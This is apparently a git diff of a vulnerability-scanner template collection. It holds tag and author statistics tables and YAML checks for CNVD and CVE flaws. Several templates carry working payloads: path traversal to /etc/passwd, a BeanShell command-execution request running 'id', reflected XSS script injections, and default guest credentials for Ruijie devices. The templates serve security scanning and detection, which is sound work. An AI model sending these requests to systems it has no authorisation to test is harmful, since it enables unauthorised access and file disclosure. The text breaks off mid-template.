| chiyu | 2 | revblock | 1 | | | | | | |
| glassfish | 2 | dogasantos | 1 | | | | | | |
| status | 2 | streetofhackerr007 | 1 | | | | | | |
| webcam | 2 | divya_mudgal | 1 | | | | | | |
| showdoc | 2 | 0xteles | 1 | | | | | | |
| spark | 2 | fmunozs | 1 | | | | | | |
| fortios | 2 | akshansh | 1 | | | | | | |
| hasura | 2 | _c0wb0y_ | 1 | | | | | | |
| hashicorp | 2 | ipanda | 1 | | | | | | |
| sonicwall | 2 | b0yd | 1 | | | | | | |
| pega | 2 | deena | 1 | | | | | | |
| wp-theme | 2 | andysvints | 1 | | | | | | |
| nagios | 2 | abison_binoy | 1 | | | | | | |
| ecology | 2 | luci | 1 | | | | | | |
| rockethchat | 2 | mohammedsaneem | 1 | | | | | | |
| dolibarr | 2 | 0xrod | 1 | | | | | | |
| service | 2 | omarkurt | 1 | | | | | | |
| jboss | 2 | 0ut0fb4nd | 1 | | | | | | |
| saltstack | 2 | chron0x | 1 | | | | | | |
| smb | 2 | kba@sogeti_esec | 1 | | | | | | |
| bigip | 2 | its0x08 | 1 | | | | | | |
| activemq | 2 | g4l1t0 and @convisoappsec | 1 | | | | | | |
| proxy | 2 | ilovebinbash | 1 | | | | | | |
| hjtcloud | 2 | sy3omda | 1 | | | | | | |
| huawei | 2 | petruknisme | 1 | | | | | | |
| wso2 | 2 | aresx | 1 | | | | | | |
| intrusive | 2 | daviey | 1 | | | | | | |
| couchdb | 2 | mubassirpatel | 1 | | | | | | |
| erp-nc | 1 | alperenkesk | 1 | | | | | | |
| yii | 1 | mah3sec_ | 1 | | | | | | |
| lutron | 1 | undefl0w | 1 | | | | | | |
| dvwa | 1 | patralos | 1 | | | | | | |
| heroku | 1 | exploitation | 1 | | | | | | |
| zarafa | 1 | defr0ggy | 1 | | | | | | |
| expressjs | 1 | becivells | 1 | | | | | | |
| openrestry | 1 | bolli95 | 1 | | | | | | |
| seacms | 1 | hanlaomo | 1 | | | | | | |
| mpsec | 1 | tirtha_mandal | 1 | | | | | | |
| phalcon | 1 | sicksec | 1 | | | | | | |
| clave | 1 | tim_koopmans | 1 | | | | | | |
| scimono | 1 | willd96 | 1 | | | | | | |
| wondercms | 1 | r3naissance | 1 | | | | | | |
| swagger | 1 | shelld3v | 1 | | | | | | |
| visualtools | 1 | sid ahmed malaoui @ realistic | 1 | | | | | | |
| | | security | | | | | | | |
| javascript | 1 | co0nan | 1 | | | | | | |
| webmodule-ee | 1 | | | | | | | | |
| spidercontrol | 1 | | | | | | | | |
| varnish | 1 | | | | | | | | |
| crm | 1 | | | | | | | | |
| webmin | 1 | | | | | | | | |
| nuuo | 1 | | | | | | | | |
| auth | 1 | | | | | | | | |
| doh | 1 | | | | | | | | |
| panabit | 1 | | | | | | | | |
| trilithic | 1 | | | | | | | | |
| bedita | 1 | | | | | | | | |
| webftp | 1 | | | | | | | | |
| ueditor | 1 | | | | | | | | |
| openerp | 1 | | | | | | | | |
| gloo | 1 | | | | | | | | |
| druid | 1 | | | | | | | | |
| calendarix | 1 | | | | | | | | |
| linkedin | 1 | | | | | | | | |
| subrion | 1 | | | | | | | | |
| powercreator | 1 | | | | | | | | |
| blind | 1 | | | | | | | | |
| rhymix | 1 | | | | | | | | |
| tamronos | 1 | | | | | | | | |
| ecom | 1 | | | | | | | | |
| mantis | 1 | | | | | | | | |
| ns | 1 | | | | | | | | |
| aura | 1 | | | | | | | | |
| rabbitmq | 1 | | | | | | | | |
| zzzcms | 1 | | | | | | | | |
| dotnetnuke | 1 | | | | | | | | |
| fastcgi | 1 | | | | | | | | |
| cocoon | 1 | | | | | | | | |
| sitecore | 1 | | | | | | | | |
| symfony | 1 | | | | | | | | |
| webui | 1 | | | | | | | | |
| vscode | 1 | | | | | | | | |
| eprints | 1 | | | | | | | | |
| sceditor | 1 | | | | | | | | |
| yealink | 1 | | | | | | | | |
| robomongo | 1 | | | | | | | | |
| k8 | 1 | | | | | | | | |
| mongoshake | 1 | | | | | | | | |
| diris | 1 | | | | | | | | |
| zcms | 1 | | | | | | | | |
| fortilogger | 1 | | | | | | | | |
| labtech | 1 | | | | | | | | |
| fuelcms | 1 | | | | | | | | |
| redcap | 1 | | | | | | | | |
| krweb | 1 | | | | | | | | |
| cloudflare | 1 | | | | | | | | |
| exchange | 1 | | | | | | | | |
| nuxeo | 1 | | | | | | | | |
| wmt | 1 | | | | | | | | |
| blackboard | 1 | | | | | | | | |
| parentlink | 1 | | | | | | | | |
| metinfo | 1 | | | | | | | | |
| starttls | 1 | | | | | | | | |
| zeroshell | 1 | | | | | | | | |
| acme | 1 | | | | | | | | |
| ssltls | 1 | | | | | | | | |
| svn | 1 | | | | | | | | |
| circontrorl | 1 | | | | | | | | |
| ioncube | 1 | | | | | | | | |
| ricoh | 1 | | | | | | | | |
| mcafee | 1 | | | | | | | | |
| kerbynet | 1 | | | | | | | | |
| tensorboard | 1 | | | | | | | | |
| expn | 1 | | | | | | | | |
| blue-ocean | 1 | | | | | | | | |
| eyou | 1 | | | | | | | | |
| sureline | 1 | | | | | | | | |
| gespage | 1 | | | | | | | | |
| viewpoint | 1 | | | | | | | | |
| linksys | 1 | | | | | | | | |
| bitly | 1 | | | | | | | | |
| gogs | 1 | | | | | | | | |
| nps | 1 | | | | | | | | |
| salesforce | 1 | | | | | | | | |
| plastic | 1 | | | | | | | | |
| lancom | 1 | | | | | | | | |
| ec2 | 1 | | | | | | | | |
| kafdrop | 1 | | | | | | | | |
| mara | 1 | | | | | | | | |
| xmlchart | 1 | | | | | | | | |
| jenkin | 1 | | | | | | | | |
| scs | 1 | | | | | | | | |
| rmc | 1 | | | | | | | | |
| episerver | 1 | | | | | | | | |
| javamelody | 1 | | | | | | | | |
| zend | 1 | | | | | | | | |
| codeigniter | 1 | | | | | | | | |
| mdb | 1 | | | | | | | | |
| adminer | 1 | | | | | | | | |
| smartsense | 1 | | | | | | | | |
| mongo | 1 | | | | | | | | |
| netdata | 1 | | | | | | | | |
| lotuscms | 1 | | | | | | | | |
| xvr | 1 | | | | | | | | |
| sage | 1 | | | | | | | | |
| geutebruck | 1 | | | | | | | | |
| cerebro | 1 | | | | | | | | |
| addpac | 1 | | | | | | | | |
| froxlor | 1 | | | | | | | | |
| wavemaker | 1 | | | | | | | | |
| accela | 1 | | | | | | | | |
| node-red-dashboard | 1 | | | | | | | | |
| aruba | 1 | | | | | | | | |
| camunda | 1 | | | | | | | | |
| biometrics | 1 | | | | | | | | |
| b2evolution | 1 | | | | | | | | |
| fortigates | 1 | | | | | | | | |
| javafaces | 1 | | | | | | | | |
| geddy | 1 | | | | | | | | |
| qcubed | 1 | | | | | | | | |
| influxdb | 1 | | | | | | | | |
| chevereto | 1 | | | | | | | | |
| extractor | 1 | | | | | | | | |
| jsp | 1 | | | | | | | | |
| rdp | 1 | | | | | | | | |
| idemia | 1 | | | | | | | | |
| pagespeed | 1 | | | | | | | | |
| lg-nas | 1 | | | | | | | | |
| sco | 1 | | | | | | | | |
| ulterius | 1 | | | | | | | | |
| zenario | 1 | | | | | | | | |
| beanshell | 1 | | | | | | | | |
| appweb | 1 | | | | | | | | |
| clink-office | 1 | | | | | | | | |
| sidekiq | 1 | | | | | | | | |
| alerta | 1 | | | | | | | | |
| mysql | 1 | | | | | | | | |
| sqlite | 1 | | | | | | | | |
| bash | 1 | | | | | | | | |
| kubeflow | 1 | | | | | | | | |
| exacqvision | 1 | | | | | | | | |
| selea | 1 | | | | | | | | |
| wifisky | 1 | | | | | | | | |
| jmx | 1 | | | | | | | | |
| upload | 1 | | | | | | | | |
| xunchi | 1 | | | | | | | | |
| tpshop | 1 | | | | | | | | |
| tongda | 1 | | | | | | | | |
| darkstat | 1 | | | | | | | | |
| openemr | 1 | | | | | | | | |
| pgadmin | 1 | | | | | | | | |
| postgres | 1 | | | | | | | | |
| chinaunicom | 1 | | | | | | | | |
| k8s | 1 | | | | | | | | |
| szhe | 1 | | | | | | | | |
| uwsgi | 1 | | | | | | | | |
| ilo4 | 1 | | | | | | | | |
| timesheet | 1 | | | | | | | | |
| clusterengine | 1 | | | | | | | | |
| redis | 1 | | | | | | | | |
| interlib | 1 | | | | | | | | |
| mautic | 1 | | | | | | | | |
| discord | 1 | | | | | | | | |
| htmli | 1 | | | | | | | | |
| expose | 1 | | | | | | | | |
| hadoop | 1 | | | | | | | | |
| netis | 1 | | | | | | | | |
| gridx | 1 | | | | | | | | |
| vsphere | 1 | | | | | | | | |
| default-login | 1 | | | | | | | | |
| triconsole | 1 | | | | | | | | |
| cse | 1 | | | | | | | | |
| csod | 1 | | | | | | | | |
| stem | 1 | | | | | | | | |
| payara | 1 | | | | | | | | |
| springframework | 1 | | | | | | | | |
| avalanche | 1 | | | | | | | | |
| wildfly | 1 | | | | | | | | |
| soar | 1 | | | | | | | | |
| aspnuke | 1 | | | | | | | | |
| bolt | 1 | | | | | | | | |
| nette | 1 | | | | | | | | |
| fortigate | 1 | | | | | | | | |
| ems | 1 | | | | | | | | |
| shopxo | 1 | | | | | | | | |
| sarg | 1 | | | | | | | | |
| weiphp | 1 | | | | | | | | |
| xiuno | 1 | | | | | | | | |
| ruby | 1 | | | | | | | | |
| acontent | 1 | | | | | | | | |
| etouch | 1 | | | | | | | | |
| tapestry | 1 | | | | | | | | |
| flash | 1 | | | | | | | | |
| memcached | 1 | | | | | | | | |
| netsweeper | 1 | | | | | | | | |
| gateone | 1 | | | | | | | | |
| plugin | 1 | | | | | | | | |
| dvr | 1 | | | | | | | | |
| spring | 1 | | | | | | | | |
| cacti | 1 | | | | | | | | |
| email | 1 | | | | | | | | |
| empirecms | 1 | | | | | | | | |
| redhat | 1 | | | | | | | | |
| plone | 1 | | | | | | | | |
| openx | 1 | | | | | | | | |
| achecker | 1 | | | | | | | | |
| xml | 1 | | | | | | | | |
| apos | 1 | | | | | | | | |
| fortiweb | 1 | | | | | | | | |
| huijietong | 1 | | | | | | | | |
| pacsone | 1 | | | | | | | | |
| resourcespace | 1 | | | | | | | | |
| gotmls | 1 | | | | | | | | |
| exposures | 1 | | | | | | | | |
| landrayoa | 1 | | | | | | | | |
| jquery | 1 | | | | | | | | |
| codemeter | 1 | | | | | | | | |
| wazuh | 1 | | | | | | | | |
| guacamole | 1 | | | | | | | | |
| anchorcms | 1 | | | | | | | | |
| lighttpd | 1 | | | | | | | | |
| glances | 1 | | | | | | | | |
| azure | 1 | | | | | | | | |
| keenetic | 1 | | | | | | | | |
| spf | 1 | | | | | | | | |
| glpi | 1 | | | | | | | | |
| visionhub | 1 | | | | | | | | |
| bigbluebutton | 1 | | | | | | | | |
| xff | 1 | | | | | | | | |
| iptime | 1 | | | | | | | | |
| emby | 1 | | | | | | | | |
| enumeration | 1 | | | | | | | | |
| razor | 1 | | | | | | | | |
| backdoor | 1 | | | | | | | | |
| mantisbt | 1 | | | | | | | | |
| gitlist | 1 | | | | | | | | |
| kong | 1 | | | | | | | | |
| mediumish | 1 | | | | | | | | |
| ganglia | 1 | | | | | | | | |
| jenzabar | 1 | | | | | | | | |
| hortonworks | 1 | | | | | | | | |
| lansweeper | 1 | | | | | | | | |
| grails | 1 | | | | | | | | |
| clockwatch | 1 | | | | | | | | |
| flink | 1 | | | | | | | | |
| api-manager | 1 | | | | | | | | |
| rfi | 1 | | | | | | | | |
| cgi | 1 | | | | | | | | |
| jeewms | 1 | | | | | | | | |
| finereport | 1 | | | | | | | | |
| zm | 1 | | | | | | | | |
| timeclock | 1 | | | | | | | | |
| fastapi | 1 | | | | | | | | |
| rubedo | 1 | | | | | | | | |
| netrc | 1 | | | | | | | | |
| tensorflow | 1 | | | | | | | | |
| lanproxy | 1 | | | | | | | | |
| panos | 1 | | | | | | | | |
| axis | 1 | | | | | | | | |
| mariadb | 1 | | | | | | | | |
| haproxy | 1 | | | | | | | | |
| openstack | 1 | | | | | | | | |
| tileserver | 1 | | | | | | | | |
| vsftpd | 1 | | | | | | | | |
| npm | 1 | | | | | | | | |
| rujjie | 1 | | | | | | | | |
| redwood | 1 | | | | | | | | |
| traefik | 1 | | | | | | | | |
| wooyun | 1 | | | | | | | | |
| checkpoint | 1 | | | | | | | | |
| viewlinc | 1 | | | | | | | | |
| phpinfo | 1 | | | | | | | | |
| ssl | 1 | | | | | | | | |
| sourcebans | 1 | | | | | | | | |
| zimbra | 1 | | | | | | | | |
| fiori | 1 | | | | | | | | |
| saltapi | 1 | | | | | | | | |
| tika | 1 | | | | | | | | |
| socomec | 1 | | | | | | | | |
| landray | 1 | | | | | | | | |
| harbor | 1 | | | | | | | | |
| ntopng | 1 | | | | | | | | |
| nexusdb | 1 | | | | | | | | |
| dom | 1 | | | | | | | | |
| hiboss | 1 | | | | | | | | |
| fedora | 1 | | | | | | | | |
| jitsi | 1 | | | | | | | | |
| nomad | 1 | | | | | | | | |
| bruteforce | 1 | | | | | | | | |
| qvisdvr | 1 | | | | | | | | |
| majordomo2 | 1 | | | | | | | | |
| ambari | 1 | | | | | | | | |
| skywalking | 1 | | | | | | | | |
| kyan | 1 | | | | | | | | |
| opentsdb | 1 | | | | | | | | |
| solman | 1 | | | | | | | | |
| tenda | 1 | | | | | | | | |
| maccmsv10 | 1 | | | | | | | | |
| turbocrm | 1 | | | | | | | | |
| zookeeper | 1 | | | | | | | | |
| dnssec | 1 | | | | | | | | |
| domxss | 1 | | | | | | | | |
| phpunit | 1 | | | | | | | | |
| livezilla | 1 | | | | | | | | |
| discourse | 1 | | | | | | | | |
| 74cms | 1 | | | | | | | | |
| magicflow | 1 | | | | | | | | |
| mailchimp | 1 | | | | | | | | |
| dotnet | 1 | | | | | | | | |
| vnc | 1 | | | | | | | | |
| manageengine | 1 | | | | | | | | |
| cors | 1 | | | | | | | | |
| bullwark | 1 | | | | | | | | |
| default | 1 | | | | | | | | |
| getsimple | 1 | | | | | | | | |
| nc2 | 1 | | | | | | | | |
| db | 1 | | | | | | | | |
| portainer | 1 | | | | | | | | |
| enum | 1 | | | | | | | | |
| wuzhicms | 1 | | | | | | | | |
| jfrog | 1 | | | | | | | | |
| sgp | 1 | | | | | | | | |
| spip | 1 | | | | | | | | |
| servicenow | 1 | | | | | | | | |
| fortinet | 1 | | | | | | | | |
| dompdf | 1 | | | | | | | | |
| alertmanager | 1 | | | | | | | | |
| commscope | 1 | | | | | | | | |
| esmtp | 1 | | | | | | | | |
| opm | 1 | | | | | | | | |
| thinkadmin | 1 | | | | | | | | |
| oscommerce | 1 | | | | | | | | |
| ruckus | 1 | | | | | | | | |
| sentry | 1 | | | | | | | | |
| sangfor | 1 | | | | | | | | |
| realteo | 1 | | | | | | | | |
| h3c-imc | 1 | | | | | | | | |
| setup | 1 | | | | | | | | |
| svnserve | 1 | | | | | | | | |
| spectracom | 1 | | | | | | | | |
| node | 1 | | | | | | | | |
| ghost | 1 | | | | | | | | |
| primetek | 1 | | | | | | | | |
| rmi | 1 | | | | | | | | |
| woocomernce | 1 | | | | | | | | |
| opencast | 1 | | | | | | | | |
| wiki | 1 | | | | | | | | |
| bookstack | 1 | | | | | | | | |
| synnefo | 1 | | | | | | | | |
| wamp | 1 | | | | | | | | |
| embedthis | 1 | | | | | | | | |
| duomicms | 1 | | | | | | | | |
| optiLink | 1 | | | | | | | | |
| cloudinary | 1 | | | | | | | | |
| arl | 1 | | | | | | | | |
| zmanda | 1 | | | | | | | | |
| liferay | 1 | | | | | | | | |
| xdcms | 1 | | | | | | | | |
| nedi | 1 | | | | | | | | |
| feifeicms | 1 | | | | | | | | |
| alibaba | 1 | | | | | | | | |
| cve2005 | 1 | | | | | | | | |
| webadmin | 1 | | | | | | | | |
| totaljs | 1 | | | | | | | | |
| myucms | 1 | | | | | | | | |
| drone | 1 | | | | | | | | |
| centreon | 1 | | | | | | | | |
| dotclear | 1 | | | | | | | | |
| postmessage | 1 | | | | | | | | |
| opensns | 1 | | | | | | | | |
| nsasg | 1 | | | | | | | | |
| octobercms | 1 | | | | | | | | |
| upnp | 1 | | | | | | | | |
| circontrol | 1 | | | | | | | | |
| monitorix | 1 | | | | | | | | |
| concrete | 1 | | | | | | | | |
| monitorr | 1 | | | | | | | | |
| csrf | 1 | | | | | | | | |
| pulsesecure | 1 | | | | | | | | |
| cobub | 1 | | | | | | | | |
| zte | 1 | | | | | | | | |
| phpfusion | 1 | | | | | | | | |
| plc | 1 | | | | | | | | |
| centos | 1 | | | | | | | | |
| opensmtpd | 1 | | | | | | | | |
| acexy | 1 | | | | | | | | |
| nordex | 1 | | | | | | | | |
| wavlink | 1 | | | | | | | | |
| servicedesk | 1 | | | | | | | | |
| wing-ftp | 1 | | | | | | | | |
| mobileiron | 1 | | | | | | | | |
| yachtcontrol | 1 | | | | | | | | |
| rsyncd | 1 | | | | | | | | |
| octoprint | 1 | | | | | | | | |
| twitter-server | 1 | | | | | | | | |
| zyxel | 1 | | | | | | | | |
| sprintful | 1 | | | | | | | | |
| mirai | 1 | | | | | | | | |
| faraday | 1 | | | | | | | | |
| favicon | 1 | | | | | | | | |
| moin | 1 | | | | | | | | |
| floc | 1 | | | | | | | | |
| goahead | 1 | | | | | | | | |
| st | 1 | | | | | | | | |
| apiman | 1 | | | | | | | | |
| comodo | 1 | | | | | | | | |
| pippoint | 1 | | | | | | | | |
| 2014 | 1 | | | | | | | | |
| pyramid | 1 | | | | | | | | |
| proftpd | 1 | | | | | | | | |
| moinmoin | 1 | | | | | | | | |
| jnoj | 1 | | | | | | | | |
| firebase | 1 | | | | | | | | |
| emc | 1 | | | | | | | | |
| shopware | 1 | | | | | | | | |
| klog | 1 | | | | | | | | |
| avtech | 1 | | | | | | | | |

12
TOP-10.md Normal file
View File

@ -0,0 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 547 | dhiyaneshdk | 232 | cves | 554 | info | 569 | http | 1646 |
| panel | 213 | pikpikcu | 225 | vulnerabilities | 252 | high | 441 | file | 44 |
| xss | 202 | pdteam | 189 | exposed-panels | 215 | medium | 371 | network | 35 |
| wordpress | 189 | dwisiswant0 | 126 | exposures | 170 | critical | 210 | dns | 11 |
| rce | 181 | geeknik | 122 | technologies | 156 | low | 150 | | |
| exposure | 180 | daffainfo | 114 | misconfiguration | 119 | | | | |
| lfi | 155 | madrobot | 60 | takeovers | 70 | | | | |
| cve2020 | 153 | gy741 | 54 | default-logins | 49 | | | | |
| wp-plugin | 127 | princechaddha | 53 | file | 44 | | | | |
| tech | 97 | gaurang | 42 | workflows | 34 | | | | |

27
cnvd/CNVD-2019-01348.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CNVD-2019-01348
info:
name: Xiuno BBS CNVD-2019-01348
author: princechaddha
severity: medium
description: The Xiuno BBS system has a system reinstallation vulnerability. The vulnerability stems from the failure to protect or filter the installation directory after the system is installed. Attackers can directly reinstall the system through the installation page.
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348
tags: xiuno,cnvd
requests:
- method: GET
path:
- "{{BaseURL}}/install/"
headers:
Accept-Encoding: deflate
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "/view/js/xiuno.js"
- "Choose Language (选择语言)"
part: body
condition: and

26
cnvd/CNVD-2020-23735.yaml Normal file
View File

@ -0,0 +1,26 @@
id: CNVD-2020-23735
info:
name: Xxunchi Local File read
author: princechaddha
severity: medium
description: Xunyou cms has an arbitrary file reading vulnerability. Attackers can use vulnerabilities to obtain sensitive information.
reference: https://www.cnvd.org.cn/flaw/show/2025171
tags: xunchi,lfi,cnvd
requests:
- method: GET
path:
- "{{BaseURL}}/backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "NzbwpQSdbY06Dngnoteo2wdgiekm7j4N"
- "display_errors"
part: body
condition: and

30
cnvd/CNVD-2020-56167.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CNVD-2020-56167
info:
name: Ruijie Smartweb Default Password
author: pikpikcu
severity: low
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167
tags: ruijie,default-login,cnvd
requests:
- method: POST
path:
- "{{BaseURL}}/WEB_VMS/LEVEL15/"
headers:
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
body: command=show basic-info dev&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.
matchers-condition: and
matchers:
- type: word
words:
- "Level was: LEVEL15"
- "/WEB_VMS/LEVEL15/"
part: body
condition: and
- type: status
status:
- 200

View File

@ -5,7 +5,7 @@ info:
author: pikpikcu
severity: medium
reference: https://blog.csdn.net/m0_46257936/article/details/113150699
tags: lfi
tags: lfi,cnvd
requests:
- method: GET

View File

@ -1,11 +1,11 @@
id: weiphp-path-traversal
id: CNVD-2020-68596
info:
name: WeiPHP 5.0 Path Traversal
author: pikpikcu
severity: critical
reference: http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html
tags: weiphp,lfi
tags: weiphp,lfi,cnvd
requests:
- raw:

View File

@ -1,11 +1,11 @@
id: eea-disclosure
id: CNVD-2021-10543
info:
name: EEA Information Disclosure
author: pikpikcu
severity: high
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543
tags: config,exposure
tags: config,exposure,cnvd
requests:
- method: GET

27
cnvd/CNVD-2021-15822.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CNVD-2021-15822
info:
name: ShopXO Download File Read
author: pikpikcu
severity: high
reference: https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog
tags: shopxo,lfi
requests:
- raw:
- |
GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

29
cnvd/CNVD-2021-17369.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CNVD-2021-17369
info:
name: Ruijie Smartweb Management System Password Information Disclosure
author: pikpikcu
severity: medium
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-17369
tags: ruijie,disclosure,cnvd
requests:
- method: GET
path:
- "{{BaseURL}}/web/xml/webuser-auth.xml"
headers:
Cookie: login=1; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest
matchers-condition: and
matchers:
- type: word
words:
- "<userauth>"
- "<password>"
part: body
condition: and
- type: status
status:
- 200

45
cnvd/CNVD-2021-30167.yaml Normal file
View File

@ -0,0 +1,45 @@
id: CNVD-2021-30167
info:
name: UFIDA NC BeanShell Remote Code Execution
author: pikpikcu
severity: high
reference: |
- https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
- https://www.cnvd.org.cn/webinfo/show/6491
tags: beanshell,rce,cnvd
requests:
- raw:
- | #linux
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Content-Type: application/x-www-form-urlencoded
bsh.script=exec("id");
- | #windows
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Content-Type: application/x-www-form-urlencoded
bsh.script=exec("ipconfig");
matchers-condition: and
matchers:
- type: regex
regex:
- "uid="
- "Windows IP"
condition: or
- type: word
words:
- "BeanShell Test Servlet"
- type: status
status:
- 200

View File

@ -4,6 +4,10 @@ info:
author: CasperGN
severity: medium
tags: cve,cve2005
description: Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled, stores sensitive data from names.nsf in hidden form fields, which allows remote attackers to read the HTML source to obtain sensitive information such as (1) the password hash in the HTTPPassword field, (2) the password change date in the HTTPPasswordChangeDate field, (3) the client platform in the ClntPltfrm field, (4) the client machine name in the ClntMachine field, and (5) the client Lotus Domino release in the ClntBld field, a different vulnerability than CVE-2005-2696.
reference: |
- http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf
- https://www.exploit-db.com/exploits/39495
requests:
- method: GET

View File

@ -0,0 +1,26 @@
id: CVE-2005-4385
info:
name: Cofax <= 2.0RC3 XSS
description: Cross-site scripting vulnerability in search.htm in Cofax 2.0 RC3 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter.
reference:
- http://pridels0.blogspot.com/2005/12/cofax-xss-vuln.html
- https://nvd.nist.gov/vuln/detail/CVE-2005-4385
author: geeknik
severity: medium
tags: cofax,xss,cve,cve2005
requests:
- method: GET
path:
- "{{BaseURL}}/search.htm?searchstring2=&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "'>\"</script><script>alert(document.domain)</script>"

View File

@ -0,0 +1,30 @@
id: CVE-2006-1681
info:
name: Cherokee HTTPD <=0.5 XSS
description: Cross-site scripting (XSS) vulnerability in Cherokee HTTPD 0.5 and earlier allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated.
reference:
- https://www.securityfocus.com/bid/17408
- https://nvd.nist.gov/vuln/detail/CVE-2006-1681
author: geeknik
severity: medium
tags: cherokee,httpd,xss,cve,cve2006
requests:
- method: GET
path:
- "{{BaseURL}}/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html

View File

@ -0,0 +1,29 @@
id: CVE-2007-0885
info:
name: Rainbow.Zen Jira XSS
description: Cross-site scripting (XSS) vulnerability in jira/secure/BrowseProject.jspa in Rainbow with the Zen (Rainbow.Zen) extension allows remote attackers to inject arbitrary web script or HTML via the id parameter.
reference: https://www.securityfocus.com/archive/1/459590/100/0/threaded
author: geeknik
severity: medium
tags: cve,cve2007,jira,xss
requests:
- method: GET
path:
- "{{BaseURL}}/jira/secure/BrowseProject.jspa?id=\"><script>alert('{{randstr}}')</script>"
matchers-condition: and
matchers:
- type: word
words:
- "\"><script>alert('{{randstr}}')</script>"
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"

View File

@ -4,6 +4,7 @@ info:
name: Apache Struts2 S2-001 RCE
author: pikpikcu
severity: critical
description: Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via form input beginning with a "%{" sequence and ending with a "}" character.
reference: https://www.guildhab.top/?p=2326
tags: cve,cve2007,apache,rce,struts
@ -21,7 +22,7 @@ requests:
- type: regex
regex:
- "root:[x*]:0:0"
- "root:.*:0:0"
part: body
- type: status

View File

@ -4,6 +4,8 @@ info:
name: AppServ Open Project 2.5.10 and earlier XSS
author: unstabl3
severity: medium
description: Cross-site scripting (XSS) vulnerability in index.php in AppServ Open Project 2.5.10 and earlier allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter.
reference: https://exchange.xforce.ibmcloud.com/vulnerabilities/42546
tags: cve,cve2008,xss
requests:

View File

@ -3,6 +3,8 @@ info:
name: CMSimple 3.1 - Local File Inclusion
author: pussycat0x
severity: high
description: |
Directory traversal vulnerability in cmsimple/cms.php in CMSimple 3.1, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number.
reference: https://www.exploit-db.com/exploits/5700
tags: cve,cve2008,lfi
requests:
@ -19,5 +21,5 @@ requests:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
- "root:.*:0:0:"
part: body

View File

@ -0,0 +1,27 @@
id: CVE-2008-6668
info:
name: nweb2fax <= 0.2.7 Directory Traversal
description: Multiple directory traversal vulnerabilities in nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via .. in the id parameter to comm.php and var_filename parameter to viewrq.php.
reference:
- https://www.exploit-db.com/exploits/5856
- https://nvd.nist.gov/vuln/detail/CVE-2008-6668
author: geeknik
severity: high
tags: nweb2fax,lfi,cve,cve2008
requests:
- method: GET
path:
- "{{BaseURL}}/comm.php?id=../../../../../../../../../../etc/passwd"
- "{{BaseURL}}/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
part: body
regex:
- "root:.*:0:0:"

View File

@ -0,0 +1,20 @@
id: CVE-2009-0545
info:
name: ZeroShell <= 1.0beta11 Remote Code Execution
author: geeknik
description: cgi-bin/kerbynet in ZeroShell 1.0beta11 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the type parameter in a NoAuthREQ x509List action.
reference: https://www.exploit-db.com/exploits/8023
severity: critical
tags: cve,cve2009,zeroshell,kerbynet,rce
requests:
- method: GET
path:
